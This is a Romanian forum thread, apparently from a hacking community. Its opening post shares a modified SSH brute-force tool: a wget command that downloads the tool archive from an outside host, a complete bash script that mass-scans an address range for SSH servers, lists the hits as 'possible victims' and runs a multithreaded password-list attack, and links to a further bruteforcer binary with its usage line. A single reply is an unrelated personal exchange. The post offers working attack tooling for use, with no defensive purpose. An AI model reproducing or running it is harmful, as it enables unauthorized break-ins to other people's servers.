Jump to content
mofomf

Ssh bruteforcer modificat putin ...

Recommended Posts

wget prg.at.ua/scan/prgssh2018.tgz

 

Modificati go si gob cu

 

#!/bin/bash

# BruteSSH v2.0 - 2018

#######################################################
#       Author: PRG @ #old Team UnderNet
#######################################################
#                  _________ ______
#                 |    |    |  ____\
#                 | () | () | |
#                 |  __|  __| | ___.
#                 | |  |  \ | ||_. |
#                 | |  | | \| |__| |
#                 |_|  |_|\_|______|
#    __________   ____________________  ___ __   __.
#   /     \   /   |    \__. .__/|  ___|/   \| |  | |
#  |   _   | |    | |\  | | |   | |__ |  () |  \/  |
#  |  <_>  | |    | | | | | |   | .__||  __ | .  . |
#  |       | |___ | |/  | | |   | |___|  || | |\/| |
#   \_____/______)|____/  |_|   |_____|__||_|_|  |_|
#
#######################################################


ALB='\033[1;37m'
VERDE='\033[01;32m'
NORM='\033[00;00m'

############ CONFIG ############
uidThreads=50
userThreads=50
port=22
psSpeed=8
passfile=pass.lst
ipslist=scan.log
##############################

rm -rf bios.txt scan.log

if [[ $UID == 0 || $EUID == 0 ]]; then

 echo -e "${ALB}[${VERDE}system${ALB}] ${VERDE}uid0 ${ALB}detected "
 sleep 3
 echo -e "${ALB}SCANNING CLASS ${VERDE}$1"
 sleep 3
./ps $port -a $1 -s $psSpeed

 cat bios.txt |sort | uniq > scan.log
 cat scan.log | pnscan 22 > faradrop
 cat faradrop | grep -v dropbear | grep -v HEX | grep -v Cisco | grep -v ROSSSH| grep SSH > faradrop2
 cat faradrop2 | awk '{print $1}' > scan.log
 oopsnr2=`grep -c . scan.log`
 echo -e "${ALB}[${VERDE}system${ALB}] ${ALB}Found${VERDE} $oopsnr2 ${ALB}possible victims "
 sleep 3
 ./prg -f $ipslist -t $uidThreads -pass $passfile -p $port


 else
 echo -e "${ALB}[${VERDE}system${ALB}] ${VERDE}user ${ALB}detected "
 sleep 3
 ./prg -b $1 -t $userThreads -pass $passfile -p $port
 fi
sleep 3
 cat vuln.txt |grep -v "duplicate" >> vuln1.txt; rm -rf vuln.txt
 

 

 

------------------------------------

instalati https://github.com/ptrrkssn/pnscan

 

-----------------------------------

puteti adauga si alt tip de ssh bruteforcer

https://www.sendspace.com/file/ks15fb

usage: ./chattr.1 <fisier ipuri> <fisier useri:parole> <connect timeout> <fail2ban wait> <threads> <outfile> <port>

---------------------------------

Link to comment
Share on other sites

4 hours ago, OKQL said:

Nu il mai foloseste nimeni, va spun sigur, am acces la mail, numai face up aruba

Ba, nu stiu ce-i cu tine, dar ce iei nu-ti face bine. Daca esti dependent de ceva du-te la un control pana nu e prea tarziu, ca ai inceput sa deraiezi rau de tot.

N-o lua personal, nu te cunosc si n-am nimic cu tine, vad ca esti demult pe forum si ai contribuit mult.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...